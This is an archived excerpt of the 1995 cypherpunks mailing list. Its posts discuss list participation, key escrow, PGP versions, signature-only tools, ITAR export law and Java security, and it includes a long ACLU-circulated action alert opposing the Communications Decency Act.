In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <9511061741.AA23439@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Suppose I have serious and plausibly realistic aspirations to become an 
>authority in some subtopic of cryptography, network security, etc. (sometime 
>well into the next millennium). Am I more likely to learn and hone my skills
>by actively participating (sticking my neck out) or merely lurking
>indefinitely ?  Regardless of the answer to the previous question, should
>the list suffer me my missteps and naivete ?

This depends on what you are attempting to do. If you are attempting to
not be thought a fool by anyone then keep quiet. If you want to learn
something then you have to speak up.

If you have an idea then the only way to know if it is any good is to 
test it. In the sciences we perform experiments. In engineering and 
social sciences this is not necessarily possible. We can still test an
idea by voicing it and looking at the response. This is the heart of 
Habermas's theory of communicative action (modulo it is impossible
to communicate such a complex set of ideas in a single paragraph).

Just because the response to an idea is hostile does not make it invalid
however, the quality of the responses matters. If you get back a reasoned
argument you may judge it on the basis of the plausibility of its axioms
and the correctness of its logic - accepting that the argument may be
incomplete and not fully explain the point of view.

If on the other hand people write "This is wrong and I've told the
person why in secret" then the argument probably isn't valid. The funniest
version of this type of post being the "Here is an example of what is
wrong, I won't waste bandwidth here explaining the faults even though
I have already done so in making the post in the first place. So I have
not only wasted bandwidth but interrupted a lot of people with a vacuous post.


To address Perry's point on social security privatisation, if there was such
a proposal and the basis on which it were to be run was that the privatised
company would gain all the data rights then I think there would be the
very type of political debate that characterises clipper.

One thing about the "new" key escrow system that people have not picked
up on. Would you trust Microsoft to be a key agent if you were Lotus or 
vice-versa? Why on earth should private key escrow be any better?


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 7 Nov 1995 02:06:57 +0800
To: "James A. Donald" <cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511042303.PAA29063@blob.best.net>
Message-ID: <9511061746.AA11219@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>This of course is the basic evil of government regulation:  Bricks are
>dangerous.  Two by fours are dangerous.  Water is dangerous.  Playgrounds
>are dangerous.  Everything is dangerous, because everything could be used 
>to cause harm, deliberately or accidentally.

You miss the central point. The NSA are simply one link in a bureaucratic
chain. Their behaviour is determined by their position in that chain and
the nature of the question they are asked. If we could change the 
question they were asked from "is this dangerous" to "is this significantly
more dangerous than allowing ownership of guns" we might get somewhere.

	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Usuario Acceso2 <acceso2@diatel.upm.es>
Date: Tue, 7 Nov 1995 22:43:47 +0800
To: cypherpunks@toad.com
Subject: Wich pgp is stronger?
Message-ID: <222*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
MIME-Version: 1.0
Content-Type: text/plain


Hi C'punks:

Which pgp is supposed to be stronger, 2.6.2 or 2.6.2 i?

What are exactly the differences between them?

Thanks, Jaime





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 7 Nov 1995 05:41:42 +0800
To: James Black <black@eng.usf.edu>
Subject: re:using PGP only for digital signatures
Message-ID: <199511062107.NAA29648@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:12 PM 11/4/95 -0500, James Black <black@eng.usf.edu> wrote:
>Hello,
>  I am in a discussion (during the week) with a system administrator 
>about seeing if we can just make PGP publically available to everyone, 
>but now the discussion seems to be to just allow PGP to do digital 
>signatures, and I don't think that is the best choice, then.  They are 
>not against PGP being used, but there are legal issues as to whether they 
>can offer it to everyone, as some students are international students, 
>and are not allowed to use the version for the US, or so I have been 
>informed, so now I need to see if we can have the international version, 
>so these students can use it. :(
>  Is there any good programs (for the Unix, SunOS) that just does digital 
>signature encryption?  What they are trying to do is make certain that no 
>one can send a message to anyone, claim to be in the faculty, and cause 
>problems that way.  My position is just a student programmer, but I am 
>trying to learn as much as I can, to answer questions and deal with problems.

Yeah, there's RIPEM-SIG, which is approved for export so you can even give it
to your non-Yankee students, and it's compatible with the RIPEM secure email
stuff.
So your US students, and anyone else who wants to download the software from
England, can send secure email, and everybody can check the signatures.
I'm not sure if RIPEM-SIG has caught up with the features in the latest
versions of RIPEM, which include an X.509 variant on Web of Trust.

Somebody else has brought up the insecurity of using security software
on multi-user machines, where the system administrator or anybody who cracks
root can steal your passphrases and even replace the trustable software with
trojan-horse versions; your students will be safer if they only trust stuff
running on PCs from software they've verified themselves.  But you can at least
do signature-checking safely on a multi-user machine if the software is
protected adequately.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Tue, 7 Nov 1995 04:04:38 +0800
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: So much for free speech...[noise?]
In-Reply-To: <acc37a5b03021004553e@[205.199.118.202]>
Message-ID: <9511061923.AA16190@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Laurent Demailly writes:
 > Thus, your freedom of speech shall stop where it starts hurting
 > people

It hurts me --- really --- to read that.  You should be condemned.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 02:55:18 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: lp ?
Message-ID: <m0tCWQC-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:

: 
: Thaddeus J. Beier writes:
: > So, if this person was sending cryptographics codes from Switzerland
: > to Israel, the code would have been imported to the US, then exported
: > by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
: > but it might be something to threaten UUNET with if one of their Northern
: Virginia neighbors ever wanted something they couldn't get otherwise.
: 
: It isn't clear that telecoms treaties don't implicitly make this legal
: in spite of the export regulations.

Once again, what the ITAR forbid is the disclosure of cryptographic
software to a foreign person within or without the United States, so
it does not make any difference whether the message containing the
code passes through the United States or not.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ACLUNATL@aol.com
Date: Tue, 7 Nov 1995 22:40:29 +0800
To: beeson@aclu.org
Subject: Religious Right Threatens to Shut Down Net: Call NOW
Message-ID: <951106134311_99292624@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Here are the advocacy instructions for individuals opposed to the Federal
Online Indecency Legislation that we promised last week.

========================================================================
       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
	(SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)

	Update: -Latest News:
		 The Christian Coalition is pushing Congress to censor
		 the net more heavily than even Sen. J.J. Exon ever imagined.
	 	 There is the very real possibility that they may succeed.

		 You should be very worried.  We are.

		-What You Can Do Now:
	 	 Follow the directions below and call House Speaker
		 Gingrich and Senate Leader Dole.  Implore them
		 to allow parents to make choices for their children, instead
		 of government censors.

		 Volunteer to join the fight by helping organize in your
		 home town.  

        CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT
			   Nov 2, 1995

      PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT
		REDISTRIBUTE ONLY UNTIL December 1, 1995
	       REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS

________________________________________________________________________
CONTENTS
	The Latest News
	What You Can Do Now
	The letter from Ed Meese and the Christian Right
	Chronology of the CDA
        For More Information
        List Of Participating Organizations

________________________________________________________________________
THE LATEST NEWS

Since the very first day that Senator J.J. Exon (D-NE) proposed censorship
legislation for the Internet, the Christian Right has pushed for the most
restrictive regulations they could think of.

The Religious Right (which does not necessarily speak for all religious
people concerned with this issue) recently tipped their hand in a letter
to Sen. Larry Pressler (R-SD) and Rep. Thomas Bliley (R-VA) requesting
a new and more restrictive net censorship proposal.

There are essentially three new dangerous elements of their campaign
to shut down cyberspace:


INTERNET PROVIDERS, ONLINE SERVICES, AND LIBRARIES CRIMINALLY LIABLE FOR
 EXPRESSION ONLINE
The Religious Right has proposed to hold anyone who provides access to the
Internet or other interactive media, including online services providers,
ISP's, BBS's, Libraries, and Schools, criminally liable for all speech
carried on the network.

In order to avoid liability under this provision, service providers would be
forced to monitor users' electronic communications to be assured that
no "indecent" material is transmitted across their networks.

This proposal is MORE RESTRICTIVE than the Exon Communications Decency Act,
or any other net censorship legislation currently in Congress.

In their letter to Congress, the Religious Right says:

	[Providers] would simply be required to avoid KNOWING violations of
	the law. [emphasis added]

However, the "knowing" standard is vague enough that the mere knowledge
that such material exists could be sufficient to trigger criminal liability.
A single complaint or even a news report could force a service provider to
take down a web page, remove posts to chat rooms or other discussion
forums, or shut down listservs in order to avoid going to jail and facing
huge fines.


A STANDARD FOR INDECENCY
The proposals pushed by the Christian Coalition rely on the
unconstitutional "indecency standard".  Like the Exon Communications
Decency Act, the Christian Coalition seeks to regulate all indecent
speech online.

Indecency is a broad category that includes everything from George Carlin's
"seven dirty words" to such classic novels as "The Catcher in the Rye" and
"Lady Chatterley's Lover". 

The Supreme Court has ruled that restrictions on indecent speech are 
Constitutional only if they rely on the "least restrictive means".  Broad
indecency restrictions on interactive media do not satisfy the "least
restrictive means" test, because interactive media allows users and
parents tremendous control over the information they receive.

Any legislation which attempts to apply an indecency restriction to the 
Internet is unconstitutional on its face.

The Christian Coalition's proposal that relies on an indecency
restriction contemplates dumbing down every conversation, web page,
newsgroup, and mailing list on the Internet to the level of what is
not offensive to children.

What kind of discussions between adults are possible in an arena
where everything has been reduced to the level of the Lion King?


UNPRECEDENTED CONTROL OVER ONLINE SPEECH FOR THE FCC
The Christian Coalition would give the FCC broad jurisdiction over
cyberspace.  It would allow the FCC jurisdiction over your online
speech, and over the design of Internet software, such as web browsers and
filtering programs that parents can use to control their children's
access to the Internet.

The Internet has developed from a government project to a market-driven
economic boom for thousands of businesses.  Giving the FCC authority over
this medium would significantly hinder the growth of this new industry.

________________________________________________________________________
WHAT YOU CAN DO NOW

1. The proposals from the Religious Right will literally destroy online
   speech as we know it.  The odds of stopping this are not certain.

   There is a very real chance that this legislation will pass, and
   we will experience a period of uncertainty and chilling of speech
   while an appropriate test case attempts to reach the Supreme Court
   (should it even get there!)

   The Religious Right has a strong grass-roots network.  We need to
   counter their energy and ensure cyberspace is not lost due to them.

   IMMEDIATELY CALL House Speaker Gingrich (R-GA) and Senate Leader
   Dole (R-KS) and urge them to oppose the Christian Coalition's
   proposal.

   Name, Address, and Party     Phone            Fax
   ========================     ==============   ==============
   R GA Gingrich, Newt          1-202-225-4501   1-202-225-4656
   R KS Dole, Robert            1-202-224-6521   1-202-224-8952

   If you're at a loss for words, try one of the following:

	Please oppose the recent proposal from the Religious Right to
	censor the Internet.  The only effective way to address children's
	access to the Internet is through parental control tools outlined
	by the Cox/White/Wyden approach.
   or
	As a religious person and a parent, I oppose the Religious Right's
	attempts to censor the Internet.  I am the best person to monitor
 	my child's access to the Internet using parental control tools
	as outlined in the Cox/White/Wyden approach.
  
2. Join the online fight by becoming a volunteer for your district!

   Check to see if your legislator is in the list below.  If they are
   not, consult the free ZIPPER service that matches Zip Codes to
   Congressional districts with about 85% accuracy at:

	URL:http://www.stardot.com/~lukeseem/zip.html

   The conference committee legislators are:
   House: Barr (R-GA), Barton (R-TX), Berman (R-CA), Bliley (R-VA),
	Boucher (D-VA), Brown (D-OH), Bryant (D-TX), Buyer (R-IN),
	Conyers (D-MI), Dingell (D-MI), Eshoo (D-CA), Fields (R-TX),
	Flanagan (R-IL), Frisa (R-NY), Gallegly (R-CA), Goodlatte (R-VA),
	Gordon (D-TN), Hastert (R-IL), Hoke (R-OH), Hyde (R-IL),
	Jackson-Lee (D-TX), Klug (R-WI), Lincoln (D-AR), Markey (D-MA),
	Moorhead (R-CA), Oxley (R-OH), Paxon (R-NY), Rush (D-IL),
	Schaefer (R-CO), Schroeder (D-CO), Scott (D-VA), Stearns (R-FL),
	White (R-WA)
   Senate: Burns (R-MT), Exon (D-NE), Ford (D-KY), Gorton (R-WA),
	Hollings (D-SC), Inouye (D-HI), Lott (R-MS), McCain (R-AZ),
	Pressler (R-SD), Rockefeller (D-WV), Stevens (R-AK)

   If your legislator is on the conference committee, you have a chance
   to influence their vote on this issue with your power as a constituent.
   Volunteer to help educate your legislator by sending mail to
   volunteer@vtw.org.  A coalition volunteer will be in touch with you.

   You can start working to help spread the word in your district by
   sending this letter to five friends.  Ask them to call Dole and Gingrich
   as well.

3. The People for the American Way (PFAW) and the American Civil Liberties
   Union are organizing a letter from ORGANIZATIONS to the Conference
   Committee to oppose the censorship provisions.

   If you are a representative of an organization that would like to
   sign on to this letter, you should contact jlesser@pfaw.org IMMEDIATELY. 

4. We can't suggest relaxing at this point.  The stakes are too high, and
   the risk is too great.  Everything now hangs in the balance.

________________________________________________________________________
THE LETTER FROM ED MEESE AND THE CHRISTIAN RIGHT

October 16, 1995
 
The Honorable Thomas J. Bliley, Jr.  Chairman
Committee on Commerce
United States House of Representatives
Washington, DC 20515
 
The Honorable Larry Pressler, Chairman
Committee on Commerce, Science, and Transportation
United States Senate
Washington, DC 20510
 
Re: Computer Pornography Provisions in Telecommunications Bill
 
Dear Mr. Chairmen:
 
We are writing to urge the conference committee seeking to reconcile the
telecommunications bills passed by the House and Senate include in the
final bill the strongest possible criminal law provisions to address the
growing and immediate problem of computer pornography without any
exemptions, defenses, or political favors of any kind accorded to those
who knowingly participate in the distribution of obscenity to anyone or
indecency to children. While there is no perfect solution to the problem
of computer pornography, Congress could not hope to solve this problem by
holding liable only some who are responsible for the problem.
 
The recent Justice Department prosecution project targeting those who
violated federal child pornography law using America On-Line is
instructive in this regard. More than ninety individuals were targeted for
prosecution although many others, perhaps as many as 3,000 according to
one press report, were originally targeted by the Department of Justice as
potential violators of child pornography laws. Apparently due to a
shortage of investigative and prosecutorial resources, the project was
limited. Since there are insufficient resources to investigate and
prosecute but a fraction of those that are trafficking in child
pornography by computer, then there will likely be even fewer resources
available to investigate and prosecute those involved in obscenity and
indecency.
 
Thousands of individuals both in this country and abroad are regularly
placing obscenity and indecency on the Internet. It is not possible to
make anything more than a dent in the serious problem of computer
pornography if Congress is willing to hold liable only those who place
such material on the Internet while at the same time giving legal
exemptions or defenses to service or access providers who profit from and
are instrumental to the distribution of such material. The Justice
Department normally targets the major offenders of laws. In obscenity
cases prosecuted to date, it has targeted large companies which have been
responsible for the nationwide distribution of obscenity and who have made
large profits by violating federal laws. Prosecution of such companies has
made a substantial impact in curbing the distribution of obscenity, with
many such offenders going out of business altogether. So too will
prosecution of access providers which _knowingly_ traffic in obscenity
have a substantial impact, a far greater impact than just the prosecution
of a person who places one or a few prohibited images on the Internet.
Such a person could not traffic in pornography without the aid or
facilitation of the service or access providers. Indeed, if Congress
includes provisions protecting access or service providers in whatever
bill is finally passed, it is likely that most in this country who are
trafficking in indecency to children or obscenity would continue to do so
since the threat of prosecution would be minuscule, given the numbers of
those currently involved in this activity. It is also likely that those
outside our country who are engaged in these activities would continue to
do so since it would be nearly impossible to extradite them to the United
States for prosecution. Thus, unless all who knowingly participate in such
matters are subject to the law, the Internet will remain the same and
Congress will have failed in its responsibilities to the children and
families of America.
 
Federal law has traditionally assigned equal liability both for those who
commit a crime and those who aid and abet a crime. See Title 18 U.S.C.
Code Section 2: "(a) whoever [sic] commits an offense against the United
States or aids, abets, councils [sic], commands, induces, or procures its
commission, is punishable as a principle [sic]." Service or access
providers who knowingly participate in the distribution of indecency to
children or in obscenity to anyone are aiders and abettors in the
commission of those crimes and thus should have liability under any law
Congress passes. Current federal law on child pornography provides no
exemption or defense for access providers. Thus, the child pornography law
provides a strong deterrent against trafficking in child pornography for
those who would otherwise knowingly participate in its distribution by
computer whether pedophile or access provider.
 
The changes in law which we support would not hold an access provider
criminally liable for all illegal pornography on the Internet which their
services may be used to obtain. Nor would it require that access providers
check all communications to ensure that no violations of the law are
occurring. They would simply be required to avoid knowing violations of
the law. This is an obligation imposed on all citizens. Technology exists
today for access providers, through a simple process, to target or flag
and remove files containing objectionable material.
 
We support the House-passed language insofar as it addresses obscenity by
amendment Title 18, Sections 1462, 1465, and 1467 of the United States
Code. The provision restricting transmission of indecency in the House-passed
bill, an amendment to Section 1465, is inadequate, and we urge that it be
substantially revised.
 
Attached is the specific language we support which includes the House
passed language on obscenity and includes revisions on both the House
passed language on indecency, which would amend Title 18 and the
Senate-passed language on indecency, which would amend Title 47. The
combination of these provisions, we believe, would provide effective laws
to curb obscenity and indecency on the Internet by establishing that all
who knowingly participate in the distribution or facilitation of obscenity
to anyone or indecency to children would be subject to the law.
 
Thank you for your concern and attention to this matter.
 
 
[signed]
 
Edwin Meese III
 
Ralph Reed
Christian Coalition
 
Donald E. Wildmon
American Family Association
 
Alan Sears, Former Executive Director
Atty General's Commission on Pornography
 
Phyllis Schlafly
Eagle Forum
 
Beverly LaHaye
Concerned Women for America
 
Reverend Louis P. Sheldon
Traditional Values Coalition
 
Jay Sekulow
American Center for Law and Justice
 
Paul Weyrich
Free Congress Foundation
 
Paul McGeady
Morality in Media
 
Len Munsil
National Family Legal Foundation
 
Robert Peters
Morality in Media
 
Kenneth Sukhia
Former United States Attorney, N.D., FL
Former Chairman, Atty General's Advisory Committee
Subcommittee on Child Exploitation and Obscenity


--------------------------

 
Section 1465 of Title 18, United States Code, is amended to punish
distribution by computer of indecent material to minors by adding at the
end the following:
 
Whoever knowingly communicates, transmits, or makes available for
communication or transmission, in or effecting interstate or foreign
commerce an indecent communication by computer to any person the
communicator or transmitter believes has not attained the age of 18 years
of age, knowing that such communication will be obtained by a person
believed to be under 18 years of age, shall be fined under this title or
imprisoned not more than five years, or both.
 
TITLE IV -- OBSCENE, HARASSING, AND WRONGFUL UTILIZATION OF
TELECOMMUNICATIONS FACILITY
 
SEC. 401. SHORT TITLE
         This title may be cited as the "Communications Decency Act of
1995".
 
Sec. 402. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER
THE COMMUNICATIONS ACT OF 1934
 
Section 223 (47 U.S.C. 223) is amended --
   (1) by striking subsection (a) and inserting in lieu of [sic]:
 ``(a) Whoever--
    ``(1) in the District of Columbia or in interstate or foreign
communications --
        ``(A) by means of telecommunications device knowingly--
          ``(i) makes, creates, or solicits, and
          ``(ii) initiates the transmission of,
     any comment, request, suggestion, proposal, image, or other
     communication which is obscene, lewd, lascivious, filthy, or
     indecent, with intent to annoy, abuse, threaten, or harass
     another person;
         ``(B) makes a telephone call or utilizes a
     telecommunications device, whether or not conversation or
     communication ensues, without disclosing his identity and
     with intent to annoy, abuse, threaten, or harass any person
     at the called number or who receives the communication;
         ``(C) makes or causes the telephone of another repeatedly
     or continuously to ring, with intent to harass any person at
     the called number; or
         ``(D) makes repeated telephone calls or repeatedly
     initiates communication with a telecommunications device,
     during which conversation or communication ensues, solely to
     harass any person at the called number or who receives the
     communication;
      ``(2) knowingly permits any telecommunications facility
     under his control to be used for any activity prohibited by
     paragraph (1) with the intent that it be used for
     such activity,
 
  shall be fined not more than $100,000 or imprisoned not more
  than two years, or both.''; and
 
   (2) by adding at the end the following new subsections:
 
 ``(d) Whoever--
       ``(1) knowingly within the United States or in foreign
     communications with the United States by means of
     telecommunications device makes or makes available any
     indecent communication in any form including any comment,
     request, suggestion, proposal, or image, to any person under
     18 years of age regardless of whether the
     maker of such communication placed the call or initiated the
     communication; or
       ``(2) knowingly permits any telecommunications facility
     under such person's control to be used for an activity
     prohibited by paragraph (1) with the intent that it be
     used for such activity,
  shall be fined not more than $100,000 or imprisoned not more
  than two years or both.
      ``(e) Defenses to subsections (a) and (d), restrictions on 
     access, judicial remedies respecting restrictions for
     persons providing information services and
     access to information services--
      "(1) It is a defense to prosecution that a person has complied
     with regulations designed to restrict access to indecent
     communications to those 18 years old or older as enacted by the
     Federal Communications Commission which shall prepare final 
     regulations within 120 days of the passage of this bill. Until
     such regulations become effective, it is a defense to
     prosecution that the person has blocked or restricted access
     to indecent communications to any person under 18 years
     of age through the use of verified credit card, adult access
     code, or adult personal identification number (PIN).   
     Nothing in this subsection shall be construed to treat
     enhanced information services as common carriage."
       "(2) No cause of action may be brought in any
     court or any administrative agency against any person on account
     of any activity which is not in violation of any law punishable
     by criminal or civil penalty, which activity the person has taken in
     good faith to implement a defense authorized under this section or
     otherwise to restrict or prevent the transmission of, or access to,
     a communication specified in this section.
     (f) Nothing in this subsection shall preclude any State or
     local government from enacting and enforcing laws and regulations
     which do not result in the imposition of inconsistent obligations on
     the provision of interstate services.  Nothing in this subsection
     shall preclude any State or local government from governing conduct
     not covered by subsection (d)(2)."
     (g) Nothing in subsection (a), (d), or (e) or in the
     defenses to prosecution under (e) shall be construed
     to affect or limit the application or enforcement of any other
     Federal law.
     (h) The use of the term 'telecommunications device' in this
     section shall not impose new obligations on (one-way) broadcast
     radio or (one-way) broadcast television operators licensed by the
     Commission or (one-way) cable services registered with the
     Federal Communications Commission and covered by obscenity and
     indecency provisions elsewhere in this Act.
 
Sec. 403. OBSCENE PROGRAMMING ON CABLE TELEVISION.
 
        Section 639 (47 U.S.C. 559) is amended by striking "10,000" and
inserting "$100,000"
 
Sec. 404. BROADCASTING OBSCENE LANGUAGE ON THE RADIO.
 
        Section 1466 of Title 18, United States Code, is amended by
striking out "$10,000" and inserting "$100,000".
 
Sec. 405 SEPARABILITY
 
        "(a) If any provision of this Title, including amendments to this
Title of [sic] the application thereof to any person or circumstance is
held invalid, the remainder of this Title and the application of such
provision to other persons or circumstances shall not be affected
thereby."

________________________________________________________________________
CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT

Sep 26, '95	Sen. Russ Feingold urges committee members to drop
		Managers Amendment and the CDA from the Telecommunications
		Deregulation bill
Aug  4, '95	House passes HR1555 which goes into conference with S652.
Aug  4, '95	House votes to attach Managers Amendment (which contains
		new criminal penalties for speech online) to
		Telecommunications Reform bill (HR1555).
Aug  4, '95	House votes 421-4 to attach HR1978 to Telecommunications
	 	Reform bill (HR1555).
Jun 30, '95	Cox and Wyden introduce the "Internet Freedom and Family
		Empowerment Act" (HR 1978) as an alternative to the CDA.
Jun 21, '95     Several prominent House members publicly announce their
                opposition to the CDA, including Rep. Newt Gingrich (R-GA),
                Rep. Chris Cox (R-CA), and Rep. Ron Wyden (D-OR).
Jun 14, '95     The Senate passes the CDA as attached to the Telecomm
                reform bill (S 652) by a vote of 84-16.  The Leahy bill
                (S 714) is not passed.
May 24, '95     The House Telecomm Reform bill (HR 1555) leaves committee
                in the House with the Leahy alternative attached to it,
                thanks to Rep. Ron Klink (D-PA).  The Communications
                Decency Act is not attached to it.
Apr  7, '95     Sen. Leahy (D-VT) introduces S.714, an alternative to
                the Exon/Gorton bill, which commissions the Dept. of
                Justice to study the problem to see if additional legislation
                (such as the CDA) is necessary.
Mar 23, '95     S314 amended and attached to the telecommunications reform
                bill by Sen. Gorton (R-WA).  Language provides some provider
                protection, but continues to infringe upon email privacy
                and free speech.
Feb 21, '95     HR1004 referred to the House Commerce and Judiciary
                committees
Feb 21, '95     HR1004 introduced by Rep. Johnson (D-SD)
Feb  1, '95     S314 referred to the Senate Commerce committee
Feb  1, '95     S314 introduced by Sen. Exon (D-NE) and Gorton (R-WA).

________________________________________________________________________
FOR MORE INFORMATION

Web Sites
        URL:http://www.vtw.org/exon/
        URL:http://epic.org/
        URL:http://www.eff.org/pub/Alerts/
        URL:http://www.cdt.org/cda.html
	URL:http://outpost.callnet.com/outpost.html

FTP Archives 
        URL:ftp://ftp.cdt.org/pub/cdt/policy/freespeech/00-INDEX.FREESPEECH
        URL:ftp://ftp.eff.org/pub/Alerts/

Gopher Archives:
        URL:gopher://gopher.panix.com/11/vtw/exon
        URL:gopher://gopher.eff.org/11/Alerts

Email:
        vtw@vtw.org (put "send alert" in the subject line for the latest
		alert, or "send cdafaq" for the CDA FAQ)
        cda-info@cdt.org (General CDA information)
        cda-stat@cdt.org (Current status of the CDA)

________________________________________________________________________
LIST OF PARTICIPATING ORGANIZATIONS

In order to use the net more effectively, several organizations have
joined forces on a single Congressional net campaign to stop the
Communications Decency Act.

American Civil Liberties Union * American Communication Association *
American Council for the Arts * Arts & Technology Society * Association
of Alternative Newsweeklies * biancaTroll productions * Boston
Coalition for Freedom of Expression * Californians Against Censorship
Together * Center For Democracy And Technology * Centre for Democratic
Communications * Center for Public Representation * Citizen's Voice -
New Zealand * Cloud 9 Internet * Computer Communicators Association *
Computel Network Services * Computer Professionals for Social
Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer
Lounge * Dutch Digital Citizens' Movement * ECHO Communications Group,
Inc. * Electronic Frontier Canada * Electronic Frontier Foundation *
Electronic Frontier Foundation - Austin * Electronic Frontiers
Australia * Electronic Frontiers Houston * Electronic Frontiers New
Hampshire * Electronic Privacy Information Center * Feminists For Free
Expression * First Amendment Teach-In * Florida Coalition Against
Censorship * FranceCom, Inc. Web Advertising Services * Friendly
Anti-Censorship Taskforce for Students * Hands Off!  The Net * Inland
Book Company * Inner Circle Technologies, Inc. * Inst. for Global
Communications * Internet On-Ramp, Inc. * Internet Users Consortium *
Joint Artists' and Music Promotions Political Action Committee * The
Libertarian Party * Marijuana Policy Project * Metropolitan Data
Networks Ltd. * MindVox * MN Grassroots Party * National Bicycle
Greenway * National Campaign for Freedom of Expression * National
Coalition Against Censorship * National Gay and Lesbian Task Force *
National Public Telecomputing Network * National Writers Union * Oregon
Coast RISC * Panix Public Access Internet * People for the American Way
* Republican Liberty Caucus * Rock Out Censorship * Society for
Electronic Access * The Thing International BBS Network * The WELL *
Voters Telecommunications Watch

(Note: All 'Electronic Frontier' organizations are independent entities,
 not EFF chapters or divisions.)

________________________________________________________________________
	End Alert
========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 7 Nov 1995 04:28:01 +0800
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: [NOISE] Re: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <9511061047.AA13370@all.net>
Message-ID: <Pine.SUN.3.90.951106134640.212A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Ahh I told myself I would not reply to this but this next statement 
proved to me the "Dr. FC" has never read the Java Language Specification.

> >       Object field accesses are known to be legal--private or public
> > 	or protected
> 
> What exactly does this mean?

Obviously he has no idea what an object field is and what modifiers such 
as private or public do.

Also as in your flamage of Netscape you won't find answers here. If you 
really wanted answers you would post to the java mailing list at Sun
where their engineers would answer your questions. But it seems you don't 
really want answers. In any case I am crossposting this to the java 
mailing list.

a1

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 7 Nov 1995 04:10:03 +0800
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: lp ?
In-Reply-To: <m0tCWQC-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511061924.OAA14371@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Peter D. Junger" writes:
> "Perry E. Metzger" writes:
> : It isn't clear that telecoms treaties don't implicitly make this legal
> : in spite of the export regulations.
> 
> Once again, what the ITAR forbid is the disclosure of cryptographic
> software to a foreign person within or without the United States, so
> it does not make any difference whether the message containing the
> code passes through the United States or not.

I understand that you are a lawyer and I'm not, but it is my
understanding that international treaties come into play on this sort
of thing. For instance, in international shipments, you can transship
items and substances that are illegal to possess in a country through
its ports provided that the materials do not originate or terminate
their shipment in the country and remain sealed in their containers
throughout. It is also my understanding that items like mail and phone
calls that happen to transit a country are not necessarily subject to
that nation's laws provided that the nation is not a terminal point for
the mail or call or what have you.

Treaties on this subject would quite clearly supersede any federal
laws under the supremacy clause of the constitution.

I am not absolutely sure of this, but I'm fairly sure that there are
already rules on all of this.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 6 Nov 1995 13:31:54 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <Pine.SOL.3.91.951106125951.9610D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 3 Nov 1995, Futplex wrote:
> Suppose I have serious and plausibly realistic aspirations to become an 
> authority in some subtopic of cryptography, network security, etc. (sometime 
> well into the next millennium). Am I more likely to learn and hone my skills
> by actively participating (sticking my neck out) or merely lurking
> indefinitely ?  Regardless of the answer to the previous question, should
> the list suffer me my missteps and naivete ?

I too have thought about this question.  While I write crypto code and know
some areas quite well, I also seem to be blessed with the ability to
